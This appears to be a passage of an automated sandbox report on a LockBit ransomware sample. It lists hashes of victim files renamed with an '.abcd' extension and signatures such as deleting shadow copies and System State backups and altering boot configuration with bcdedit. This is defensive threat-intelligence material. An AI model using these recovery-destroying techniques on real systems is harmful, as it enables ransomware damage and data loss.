| SHA512 | 9255b4a4e9186493a5af13163081feca7b2612b474a18fdb102ac1f742e5af0cfa9a77621217ba80e9e27b1942ea1e6f36d13901333a57ffaf1cf73ce51e959d |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\XLINTL32.REST.trx_dll.abcd
| MD5 | 5ddab44cc49140238c83cc7f7f6b70a9 |
| SHA1 | e61353fb1d1c4dee95e82ac7091084fd537662f8 |
| SHA256 | 1b94fea1febc0e4ee8f25958bfd2b503856885da74fc1a100360e250354ef5bd |
| SHA512 | f9ab67859cf0d5f6db5ae564cd2fb9107946e5ba6e300eedd508afbe54f8cd84f2283499a1ab90bd6d626e2e2609f797cabab4494c4878211bcd93f99bcccbf9 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\XLINTL32.DLL.trx_dll.abcd
| MD5 | cb9f460528f3213c72dfe5948af97c5d |
| SHA1 | 9c90e9779011fca6e5a5f25408b5a7e9d432da66 |
| SHA256 | d800e63ab750b75658e462e2a195c47502aff4f1036673d3c6379a82bb783283 |
| SHA512 | 9bbdb01295b4d6fdf379746831dd2ecc6d274efe3623df007979bc661325d27bcfe8c33c58dbebb62eccaf2fe1244e1310c6d628929cb2fc7f499931392b9563 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\WWINTL.REST.trx_dll.abcd
| MD5 | 50b18aaeef79712d8ded84141323043b |
| SHA1 | b85a110f13b175106211c95f412ec0ec8cb3d27e |
| SHA256 | 715fd946151003b9f1a5672aa8161042f62c33efc5bb5ee1942bd1b16137f948 |
| SHA512 | f85937dfa04b78e2d955b927eb72ba1799ed324f58ee0c8f80a85a5e9321bbe2b33320311449420e70adf9e8905e37c78beef3b004a9de24846b1d6d081dd35c |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\WWINTL.DLL.trx_dll.abcd
| MD5 | fc3f870c848160020d17d035e07b7d90 |
| SHA1 | 05aefac883e52b814a9d71fbf8a0cca6512fa49a |
| SHA256 | bb0751a66e7afc470cee52a8202f0a286fc2ce597e400056604f14863a6f8539 |
| SHA512 | 522f2d089ed096e8780768c8518bca17c888c4a118655f52ac0cd3ae55abca51fff9934f79afbe4a70d9b54d0a4ff406041fb6446ac1feb2b37046001303f7f5 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\VISINTL.DLL.trx_dll.abcd
| MD5 | 2ccdedece1ee2f2a3dc402c9fa48f286 |
| SHA1 | da3a34ea5062a6461339f7ad24b66e453931612c |
| SHA256 | b0e06ad54e8f8c1e21cc25b66db5e7d474e7175d82e46cc3880c3e2ec29af544 |
| SHA512 | f40007e463a128ef35c0da2bdf8a3a8fe8da045669ac9c33e5148b31c2375cd8e506952202074604dc702c72893b68e1199e8f5a7d3f1a1ebe75b6337ebdd717 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\VISBRRES.DLL.trx_dll.abcd
| MD5 | c7872311cee687a6b44a341e7e2287c9 |
| SHA1 | bbf746870ec675487c1bda63478c3e952abcb4b8 |
| SHA256 | 4df46ade093cffcf2f7a978c4220f55c9125d39477d21d7db8be2e84c075c1cd |
| SHA512 | 0b0171f62c54ff8df65cf6095e1a5776c3071ab775228fc168c7f8e38f3739e1da9538a69a23b4ee3b81411420afd1d27a299e2585a2326ba16542508e9e8ec6 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\STINTL.DLL.trx_dll.abcd
| MD5 | 1ecdbd4e260d87b304b0a3eb67c45526 |
| SHA1 | 7797a21c9725614ab8d4bbd4bc53d1846de41f34 |
| SHA256 | 5cdc8327273098c79d961fc4f040b43cf711288046fbe2b51c848b8a8b4fce05 |
| SHA512 | c0834834a4d3c7f74810f8cfc4fa2c82dadb958b3cf406103bc2a33bdd0fef7a832380e47e7357dddd285bf7cc7326ce0021a5ac5c86825476735a70f729a243 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\SGRES.DLL.trx_dll.abcd
| MD5 | 6cb6ae22d4da759851a305faae74d8d6 |
| SHA1 | d343ba7936ea932ddb43c57777471ab90c7a1496 |
| SHA256 | bab19eb99627073ae81b52b0ef06aca43363f4c1a283be1c3eb4ccb689cc8b55 |
| SHA512 | bb7c44aed3f6167282cca2c0ddf499cce4c03e23c163d9cb27f58e33a91f379f79f414be1779372e7514bfb52a8455358e71111905057a4466f422b1df8d2290 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\PUBWZINT.REST.trx_dll.abcd
| MD5 | 8508a99cdfd57a8be3abfc5da8c55ec6 |
| SHA1 | 9a1d5b678c17d987000c3c3a53fde996d8ff1480 |
| SHA256 | 99ec5d22c3ff27aeb3b883da886c3316a3d8a84a5ff1ea9c66c019df43c881b7 |
| SHA512 | b64a4a4b4ccc1bfbd1d49f6ff96a88e451bc43e984a0e8684777dfc50540206192a7165c87d790cdb286e0db63005572f0bc00e80ad8d2b252aac40ecedd5927 |
C:\ProgramData\Microsoft\MF\Pending.GRL.abcd
| MD5 | 3060b96749e33eacce926aa1fd4b7283 |
| SHA1 | edd5411d42cc9242f79f8d66e63b84aaab135cb7 |
| SHA256 | 4bac98ce35b2d67df29b8708546a19a77dd1e06f08e7c4095c88d8a032da6b92 |
| SHA512 | 9653304c5f1b2a9cfebb2c953c1f33f8e61ff527ab28da3f8af339546fc0744378276ad6513c19c2fb8024efb4d1e979c6cab6b3ccfe06e2f259178175c618f3 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\PUB6INTL.REST.trx_dll.abcd
| MD5 | f9cc311d804e26d545bc054f5ad9910f |
| SHA1 | f2f01beb6f32d138171b25dc80f11e140ba34a1b |
| SHA256 | 2f979f72b120f65ee804c2090a8c8a27f6ed262722d1b467c6c07b5700afbf5d |
| SHA512 | 7115dcc4934189bbc3cbbadb7eb5cefdea3556f5a0aef823e46a321e822bea6c4f79c696d7a8728c7510a36efa461037569654dc2ef0e95ffa8cd2ba6e73996c |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\PUB6INTL.DLL.trx_dll.abcd
| MD5 | 1dd2967aba8cb0569e96b18281b6fc07 |
| SHA1 | 977339ef61ef2be6359f4c133e674d7b3d52aede |
| SHA256 | 42c6347351b9dd651b20f5d0be3e285f1f2aa03cd02f67b91c672fa73f69973d |
| SHA512 | a8f84f9af4eaa7f968549a29426a4f2d0ba6b74fcacf85c8cb4bedc5f59f4267d5fe3d82b7f411218bd4e5507e335f5f4876de61e70110621a0105101ab9e6d5 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\PPINTL.REST.trx_dll.abcd
| MD5 | 31e2f089f1604078882df7063d85bf5e |
| SHA1 | 48345b20174a3081abcb31930e9d3023323ad5eb |
| SHA256 | b56962d2c50cbb3edb20ec3f59b613be9428210213119483303af8c3826c4ecb |
| SHA512 | 53e4aa74ce1338b3cfef617f672e452aa4e3b4bb7ffd96700f92b02f210ba9c7517ecc879d251a8e968f559f5666f8bacc9c7d4e6b3efc88f3780edc411c900f |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\PPINTL.DLL.trx_dll.abcd
| MD5 | e1431209f88caac7ed43ca38ef6f02db |
| SHA1 | c58e813153c16757b1af65337cd642aeff12bc7a |
| SHA256 | 3443b9e515846cfbe42d4c9f9e38a98fda15d3b58d40a88942830a736bb57983 |
| SHA512 | 21ebfb76c0c500fbef86945d13b4f89c3777bd72db096ee4f32fc52a7aa7fa1da123fd689d3e974d2cf3bd84c55f5a869e17a7edeebeba94623dd18539a7ede8 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\OUTLWVW.DLL.trx_dll.abcd
| MD5 | 1cf007fd8c8b34e09c90d7b70c7a16b1 |
| SHA1 | 33e7770a620478d62b22f413c5421c21e3c6ab19 |
| SHA256 | 593d5c96f60d72b10f3fee841f22714f947dad53d80b91b72d519a3a0ed33e2b |
| SHA512 | c76151b45df78d44dac98bd0fe102ff97994b102fee35cedad27f41e9265dc5f0d8147676480e4b01627aa719e6c3c475b24e8777cc86b4c3c2dc3e8f4fe1de7 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\OUTLLIBR.REST.trx_dll.abcd
| MD5 | c63c578a819314b75a451d7c72deb878 |
| SHA1 | 7a35e8255bb6e9f376ca16ba037aa3a1cfa25438 |
| SHA256 | cb3c80814e5394d24e29575385d838188349ae17f03e1222af803bd9c6219f71 |
| SHA512 | 7eb76b66bcc5081bcb3d079932d437bfa2d69bbd4374d56c13f0c7c557bd94fee61b9da73d0e8e67d7a7a154a8357eb8794ba5f8db59ce55eee7c8024b0dcfb3 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\OUTLLIBR.DLL.trx_dll.abcd
| MD5 | e0495dbc4d94c2cd8c9793eb045633c7 |
| SHA1 | cc006b8a5c6f35165da03687c41b8e20532345b4 |
| SHA256 | b828fbe2dee249b235423c3b7f91ba6867ff489cde1ce265bf90926a1ad3b484 |
| SHA512 | a7400c7f2df9d4088f28f08f26e3d273a2fb0d9f99f9ef9dd5c3683ac5a9ef0f119e90ec837e80409050244cb1fb90a1035f7c90f0058bec956562cf8add93e2 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\ONINTL.REST.trx_dll.abcd
| MD5 | 6cf9b1a2465d7c712571777f4842a2a4 |
| SHA1 | 9c099f9bcb974e70090109716e83110b5a0083ab |
| SHA256 | 70ff2a0e3ab4ba237b49415ec4cb13aceeefb26085ab2a21819a8cd29a9512a1 |
| SHA512 | fed221a15671cf85053880597dee6ce2f6997aa6a115bb8edbf5afc7717b989180cf3b81d539d83dd5c568e1505fe663c676529b13f9bed99ffd88a0ea39fb57 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\ONINTL.DLL.trx_dll.abcd
| MD5 | c0916441988580d25a9dc1674b6ecec0 |
| SHA1 | 19c630c928e7a402484a18ece447fdd1fd4bd69f |
| SHA256 | bee26abd51decca8eae02b4333cc0c85f513532432dd73fd65a37c31c05146a9 |
| SHA512 | 44b727d6901b5fd439e790c1a3f7f65d4d16c0deb4d18bbb5ab22f9efe124e26081ce16d04fb31bdb775d9069bd02f5304eaabeb60ed7600ccbb2d9de6ffb396 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\OMSINTL.DLL.trx_dll.abcd
| MD5 | 4e05a1198e3bd417c5ab123977b6e73c |
| SHA1 | 23eb93579610d563c7409289a9c73cddbf1accda |
| SHA256 | c5933ecaf44c52369f0e5a97df082192c43ad1547d87ec15beeb3c1bec73185a |
| SHA512 | c211c40e4b084af91282c7afb3ded4f042f7541420414b7d5adde2ab6526ffbbaa91bc71c44c2a20d975b024fd28590e543fb1321a73cb2ec7e092a187946071 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\MSOINTL.REST.trx_dll.abcd
| MD5 | 8869486fd6483d14da18bfeebfbbb9a6 |
| SHA1 | af656a033f9785bcf2e47724735f9273eb590e76 |
| SHA256 | 7cf9fa0f8ae728002bc707df9a97a99bdf6d661b60cfa5115c4f0e68313ce75b |
| SHA512 | a37f45af762fb1870f553d996919ecec7d6254333315d67309dbebb3106e6b7926c322ed6364cc27e4238a16d358de0882b1a53e9484464a3d11d6c59fb42ca1 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\MSOINTL.DLL.trx_dll.abcd
| MD5 | 41f3be96f40535ba5b750385a2315d59 |
| SHA1 | 57abae7418583257c8a3a7eb23ad7b5c38d35e28 |
| SHA256 | 73c2addf7a905f7ae0853ea8a6aa3eaa207df5a18d183f04f9bf8a741518fa89 |
| SHA512 | f3e6e7c0b8e97bb1cf6f36ed6419545e77c7717553d07b2908534b7d5ca6189376fe030df145c06514ca6c4b66362cbabd928383645857e94333927d518f87d6 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\MOR6INT.REST.trx_dll.abcd
| MD5 | c9e9c53a9ce888e606ca79d6e5b36193 |
| SHA1 | 6aa4ec8cfb4f81672f6d32810459014edba79afc |
| SHA256 | 2c194eda3eb60af30169cb184b2ea2486c81607eb38d128f64adaf5bea2fea7d |
| SHA512 | a7fb2b7b5f57c9a2cbceada7eacd6c8f03be41d8fa48aee9278ac6f5789fc930be6218bd9a56cd56d22f7f3f17d8249df04a924e7225d6c587fab7a90d524f89 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\MAPIR.DLL.trx_dll.abcd
| MD5 | e2a48ae7d2e3d2f1edf9182e0c38f2da |
| SHA1 | aef967bfeb78f1583ba3859f5fad3241f9809a75 |
| SHA256 | 18aa51e590088f6676e9d3dc936e1427b64d03a0e90387c60e350ad362c483cc |
| SHA512 | 307836ff0c1784291a1a79875bf65bddc62b9a627ab91f92f202182873b386ae9af63a1c13bf1264714f7b828c990e0b243688c9d211e035d6623cc61f73aecb |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\GRINTL32.REST.trx_dll.abcd
| MD5 | 16ff470eab8e9709c03775962ab8a770 |
| SHA1 | f025b2274fa495f2c6f8b4f01d0969c7485a49ee |
| SHA256 | 6b74f419905e61ec3f8127589b015a1e84dce04f7ded9577e8f59a5eaae0925f |
| SHA512 | d4b66bdde7cdf147856689fb5d6d5aef026590ad907530fb516274f82beda7a4b7370ee70ed19db67e9598529ac51732a2dd3414b145722ff962c150411fcb12 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\GRINTL32.DLL.trx_dll.abcd
| MD5 | e96630ff70896fc70f7d99e19776ea75 |
| SHA1 | da097699870bb8b939e32dc59602038256076c96 |
| SHA256 | 7a5088d2f1fcca24197eafc7ff00573d260cab8abeef1a3f86dc4023fead67e9 |
| SHA512 | 233ba23f80f6e665e3bcc61ce48f7006528f0b1ea49e724f9d619e4bf0fc7742bcbfb42701f905cc690d8dfa7501d2ea6c36b22b766cfc9b2207f93c8d57aac7 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\XLSLICER.DLL.trx_dll.abcd
| MD5 | 256e967fa48539bccfd23ba0454f0dcd |
| SHA1 | 3497845c4bda5b7794d319f880f104aebff61983 |
| SHA256 | a3bdf61dd11215fe66d158a5ceab4060c23e1fc541fd4cbb734b2950b92c0726 |
| SHA512 | 788c88d979c07614b9e57f0a3b1d8436c99143ad0e83b3ee639c595506d6bb5360a708eae02e51b2d8418b1e29c792846faa28929bcbbb071e5020683718eddb |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\XLINTL32.REST.trx_dll.abcd
| MD5 | ce86626f0009c784cde4136fcba8ecb1 |
| SHA1 | e10db682d28f77115f218c9a5c3f56dd1ba0a6c9 |
| SHA256 | c9122cea80ca73acb5d51ca8efd5a291e5eb39d513a88bc633d0ced56269efdd |
| SHA512 | c22d9256633b02a73678075557637fdbdd862ec0cb465152a53ec46bb057c3042ed01d1a92cd60f0f249e4a367284c8fe412b16f5eac36db144c6124b2f3b6b7 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\XLINTL32.DLL.trx_dll.abcd
| MD5 | cbc1f29cca17a82f2c6edf7b878df24a |
| SHA1 | 837d76bcfb1dd9d2e6140aeeaf2741e2d3d8b377 |
| SHA256 | 2ac70c53c519ca2f87ae527b0370f9b4103535d0f5c51565bfd1bbc919fb1c65 |
| SHA512 | 9455d6c6c94d3d29926a1e7e2e4ae9cf51be72a3d54d72c739ed79aa2c8de682c21e9a2d884b65746f8ec93a49bf37af1d443a4644fd1d67e65d687ba107f19f |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\WWINTL.REST.trx_dll.abcd
| MD5 | 3138161e95f15b3fd8e9c83de52c8b43 |
| SHA1 | eb7a21bb6e656f820872e735807cadd1d5cf19f5 |
| SHA256 | f92fc8fad1cb5e7b5ea4f1e47ee9caed12c6e90c0541bdedf4d4b29f6b9a589e |
| SHA512 | 1702d5b2bb586c4ef25a981b4400ac3dbd653af94a826d971fab5ce92e4fca9f87167901269b6f76bdc41c658e4ea5377fbf06b096f2915cc6809f3397455fc3 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\WWINTL.DLL.trx_dll.abcd
| MD5 | d1399ac13d7d14dcc68d5bf125a27cf9 |
| SHA1 | ab5eade98ef395016a79bf6a6c28fc998af8effe |
| SHA256 | cd863c053515f887357b55d1f55ece38e9860e125e1f3ac23dbd91e14f8751b6 |
| SHA512 | 26eb3f75d87abd3bd26b20d5e7666fa30c81d0adb1bc744893b1e3e75ed2b0eea31e7a99040c31d9442f9ba39fdc19d0f63e307b35363ab8610834e857c955b5 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\VISINTL.DLL.trx_dll.abcd
| MD5 | 12e9a4e0e3a1a1ad8b79aba09a0471b3 |
| SHA1 | e3e82ed5b8c46e60376b3d227cfd1f644ca7602d |
| SHA256 | 8cb59ba5e27c56d66998d2993cdbcc302d84dea2d8c7d2c63c7686e74123dd43 |
| SHA512 | f7fd4bfd0289c18681c26eaa57e569fee474d3143cb55325c120bf87724e545eb0b03757750f3d15803c586214a2fe4e8091c2aac69ba20495c0a163c6186451 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\VISBRRES.DLL.trx_dll.abcd
| MD5 | b6a84204c97c99691d0db74d8b461dd6 |
| SHA1 | bff07c9d03f3c4a05b9d8e8846d0f092b940f2da |
| SHA256 | c9a2c0f2ab9a21d5b868061bb3e248f39b24ed05cb00aeedfb423bb714dfbc59 |
| SHA512 | 60c4a052824c8ff7c542fb898351be0edbd6d77a43c4f1b29122eaa5843a907fb7b7d0c8c14f193e2c7d9b86e2bfc5ab748d3a0fd1b665a3e0157458cc21f897 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\STINTL.DLL.trx_dll.abcd
| MD5 | a88ffa09da6b6a741025261df7101243 |
| SHA1 | 9265ac224fd0617127dacb40f0853d753f4e78b1 |
| SHA256 | 638ab840041b49a7a01e4f1aae3f4bc440b5a529ae1876252dc511e077a5f936 |
| SHA512 | fc59490ab3d3e5a995b0d3908a7707add9c82b22526bcf67a44f4c4f058a48c3f7b2d3860945464a84a0fd0dccba8d0a17e7f04f9810611b67124a7d2cf0c781 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\SGRES.DLL.trx_dll.abcd
| MD5 | b8c725ab35fab4d0eab934103d2dc3e0 |
| SHA1 | 9dc34a636157fa9313c220617d0814eb9121a22f |
| SHA256 | 8d535f9984cf3bf03620ae284e21cb5f299bced4b031532fbebe0444b3dae2ef |
| SHA512 | 3dd4ea8c6344ed30286e036f8301bfaa2055114d1ec575ee1b58df63bb5dba1ab9bdf8dff96603e1b6289a9eadbb03b67ef01bb599396e9157d4c4b3cb4d7420 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\PUBWZINT.REST.trx_dll.abcd
| MD5 | 410086ecb457286b6ee19214ad493a3c |
| SHA1 | dbb4f93ab0f269e28f0956c751754ac7a7c2d8c1 |
| SHA256 | 79fd7a294d03c4f2bec8fd05fc19c44f2d23b90fd817667e12d852402201640b |
| SHA512 | eca1996200d467664856ca793a712c95c916014fb0c32ae2982161d92af14f692c3548c89b825b11ea251719a137ab5c1eb98605de99ca85163d581b3ed485c7 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\PUB6INTL.REST.trx_dll.abcd
| MD5 | 22a47763dc22ca945cbbc0331cd7bd0c |
| SHA1 | a99b899afdff3f8b8ab86ab9833ce36e8b9b340a |
| SHA256 | 8b825347bad94001ebc675c60900c7a190b8be20fcd2e1dcebee8d4d2a1fe5a1 |
| SHA512 | 80dba128808125bc118332fb5a2273e3ae7ca07f317a2ae7b70b9f4de6eae79e97d063432bd6404c8979601ca51615e2c991b19750133cde7daf1bfc6b078167 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\PUB6INTL.DLL.trx_dll.abcd
| MD5 | 91306e3bf5b8567331e271347eb96a1f |
| SHA1 | 02bc7d37d5f3fe5f5eeeeba9439c7914dc9ae207 |
| SHA256 | 1664e5461b77209bc9f5bbd8a74778cbe789549e36fd0758546a1d22cc9e3d04 |
| SHA512 | 2f09153aade6107ad05be8ffeb8f50b4f02849358b388523f400b2b204b238c41e1ae79addea8feefe939c5e62a80a3335e213aabfad78c46403d5095d0b0c4e |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\PPINTL.REST.trx_dll.abcd
| MD5 | 05669343d650aece52e46050e61a2055 |
| SHA1 | f2e02b5fc8f03c1635612b2ba0c501f064be0a6a |
| SHA256 | e712b0ab7e4f250bd80748844b8197400e177dc4ea40c1c11a2c8127317d5136 |
| SHA512 | 219dda28c089422bfbf48072d2f6545c30f97a6e015903bef130d6d8d83d837290c35b5d527fcc723833f7308ccf112719e5e6b0481ea73eee4664691a0c3487 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\PPINTL.DLL.trx_dll.abcd
| MD5 | 2a6be74992438f7586c66fb93038448d |
| SHA1 | cd4e2da460ac82febf6ffb47d5af30a26eae0e63 |
| SHA256 | 15e684677945adce07b0bbe428773f192e8e27302f78c4628ac8804831affa14 |
| SHA512 | 9d8752357d867729d001d79fd853bde674778e10eec1b0e1b4fd841ee9fb92cb143d183e82ad63621f3f31909e2aa4d70aa87e3c5e036ee4f491934070eb1df4 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\OUTLWVW.DLL.trx_dll.abcd
| MD5 | f2edc361a898c023968e3b9e72133669 |
| SHA1 | be9dc92ce9fc4b833ddc7f499d89804a516638d3 |
| SHA256 | 5b3b60dc2e6bcf223d1867bafef9df9772088de5b1d39644cbcbb0601219b0c6 |
| SHA512 | 415013bee4542f9a48703d45c66bd17be9698dadb01b93ea84bafff9ed110295e528441a7c732ec71009115db403e1dfa5955ed88a54ed40f0593d3ba8efe0b1 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\OUTLLIBR.REST.trx_dll.abcd
| MD5 | b498e432d52d9448f3b1748c5e112244 |
| SHA1 | cecbd2b532d9a8eaad948848d4a979bddc86f351 |
| SHA256 | a5327c5b55fd706ab465176c289b27b996148a76553a8d4031d6b5eb7ac006e3 |
| SHA512 | b0e4026b0dfcc779a12ead6957a43aa37149a8409e7f93c0f5d48876880b3ddb16fbd7aa3ceeed1fd33450b5591dd5351b53a0666f5e48423cdbe9d6e12e6bfd |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\OUTLLIBR.DLL.trx_dll.abcd
| MD5 | e6804edb21a5f428db8baa5841d10bfd |
| SHA1 | e1c785086209a42dfe987ff9ba5043cd0138bd16 |
| SHA256 | d7838674163de100a53583d1f4a6b15b1d8fa89e0bef4167457b0f5421493f61 |
| SHA512 | 807337ee22a9f0e68b7fae3eed2af8e1716df82c5d2537294f21bc42afaeb25da1e22813cf65e09f9abddceae6b09586cedaae4b17a4dc79943367ae1934863c |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\ONINTL.REST.trx_dll.abcd
| MD5 | cdf80ed4bc90de2a7121a3934cdd6d98 |
| SHA1 | 94d57ce43af9a93f4826e515135d1b559073eeac |
| SHA256 | a839d82b4367b99263770584d4b085fd52c5a33660fb4608a4a863ee283077ec |
| SHA512 | c95dd62620469481ac59e09694232856d2108859ed623a5268f3c9388da89787ced5c36327e998605654417d28f1f02c2801c37c2658f24800a436dca983543e |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\ONINTL.DLL.trx_dll.abcd
| MD5 | f7cf96450d202189b2aca8aa5eeb0569 |
| SHA1 | d43be108a16323e63f5534eebdb84186bd8c354e |
| SHA256 | 427b42aff0e4e06ed4adc205f3b98de5988ed1e932658409d5a9cfd4e2ed3741 |
| SHA512 | d68caa0ef4c96b4aa7853378f5080aff19c72be29f7bbddcb68d94c04813a84052b6eaa6706ed2ed95ac2b03b3ac1b1d6fa5429ddea6206ea6fc2a21faf6ec0f |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\OMSINTL.DLL.trx_dll.abcd
| MD5 | fa030daef99032d601446575c1876b07 |
| SHA1 | 072be7287bdac6232792d4245b4534eb3aab31a2 |
| SHA256 | f60ce852699e848689cf3b164aab5d9058914f91324ac9e26bd649084706ed24 |
| SHA512 | 02be64ed6b51950d597772b2dda0bba80d4bac936b2852ddd81918e23bf77767cb266414b9c179737cb3c761fd44ba1391acbe814731109a1e6929cd88c25ec2 |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MSOINTL.REST.trx_dll.abcd
| MD5 | 28de2fe80dfab381960502836cf00e0f |
| SHA1 | 60b0033432c996bc5ff35ab3953d29c3f98292ca |
| SHA256 | 918fc071794e9f70369ee0fa9b79c50f4a110eb32453fd5f270a311c2d47d835 |
| SHA512 | e8f8e3a2cd2bf80851411eda26d822a1edc7b5762101313862eee5712e6aa8b0bc5f8557417260faebb6252fc7a4e1fa73c783f2a49cf15aca6074247d45bd2c |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MSOINTL.DLL.trx_dll.abcd
| MD5 | a1dcee4bb16da21660f218cceebcb914 |
| SHA1 | 4ed795e0ffa59413e45236fe2e97e57606ce7fd3 |
| SHA256 | 4ba5286e13e4eddcaeb4c97023b03ced45563820f2fcc32a91aaa37fb05f8fd1 |
| SHA512 | 45685a9290f526e6a7e0583eac952cec144eb3d7713377913fb18e6b865bc80ecddfc3bd1efb2db5e9161dcd808b74c0f6efc190213cc787cd1d5d95027c90fe |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MOR6INT.REST.trx_dll.abcd
| MD5 | 413e4698b7052ab559fa39699aa2eaff |
| SHA1 | db545f49db87492254816984a0ca41882893091e |
| SHA256 | 6adf0500929ccf26875ab3ef95ca4ecaac22690a65b2562c380879f954b8ea58 |
| SHA512 | d19d4a7fcef9716574406b7c6264d6ba0f66f06cb42a58267befde34069919c40b392fb960488f8f05aad7be013c2220c4da4705a963477c9f660dd35474c4fd |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\MAPIR.DLL.trx_dll.abcd
| MD5 | 3b5cc32b2db653abbedaf430322c009c |
| SHA1 | 7da7585c29b9e71cc4be379a26522cecb0bfb844 |
| SHA256 | f26f74d4259bcd246ba6555dc132685e004c9e4eb9ec3ae8017dd3fe84138999 |
| SHA512 | 8de2015220699db11f2479b3f30b0c19210cdf32aa01bfcd24d203dc03d39cfb44ad2cda784b4853411bed56d588bec9efc0808a942c63e530da38bd305410ea |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\GRINTL32.REST.trx_dll.abcd
| MD5 | 867503f6ddfef81b4c4201a8a552c295 |
| SHA1 | 5d2325ed9978b29f4549bed00fa3e92a502768cd |
| SHA256 | 63304fc0271649d820f9e8f040be1d8ae0ec7a98f4265df48915e94667e188cb |
| SHA512 | ee7348db7629339fba16e6435263db61ce8e99b26b6cecd8f4941bb2296838bace428654f0ac79887245ef253c12b1dfc7a24906b638aac167ff25de770c6b8d |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\GRINTL32.DLL.trx_dll.abcd
| MD5 | 988b3bb309486ad198d788c7aca7766a |
| SHA1 | 5e2a99456744205bd56ca083400a95f237516d3b |
| SHA256 | b1124f5a1402b3c1aa08f6a6c71c206533689d6d46bb984461f6f38427fc1427 |
| SHA512 | af9167ce41f37b3f98c0360571730cd5095d42e868869dc5db1da085c2b4bb3be15c7019141523e15833390a5e0f62b7a286ac0cfc6b03eee8c33a090e378fca |
C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\ENVELOPR.DLL.trx_dll.abcd
| MD5 | 3e538ce2345718b885062a9e40925614 |
| SHA1 | 240951667224a2c0e9bab57ad97b9c9d90b40fc5 |
| SHA256 | 9943e7795bcc66bb423c2f9343300eaa494d9fcf3b1c4578477c34f2a7ff7759 |
| SHA512 | 90714d5cc1ee0b9c280e395ce9bede63d0d0b9721c501ad2703c5a1a2b9a98fc13a0ffa39ffe9cd342023336e911f465e2a958207d582ca5b61607be08295d3e |
C:\ProgramData\Microsoft\MF\Active.GRL.abcd
| MD5 | a7436f9942f81a02345a7a287eb3cd5e |
| SHA1 | 4295834657c188bd2ff4ab3e8b7be2efc4f79784 |
| SHA256 | c25c7f5949ca884e512c3b725a51f4d93a60de7f05cc89518bfc842d2dcffe82 |
| SHA512 | 5b36a09ca7d6c6f47c44fadca1fc1dcfaa0bc136f46308e88273a37d56b55b18b682382bce08b6f65b0f4155b26b3bd9c8615f61c91eb7456f3ad0c300ea0284 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-15 03:42
Reported
2024-02-15 04:08
Platform
win10v2004-20231215-en
Max time kernel
1161s
Max time network
1166s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Renames multiple (6432) files with added filename extension
Deletes System State backups
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\wbadmin.exe | N/A |
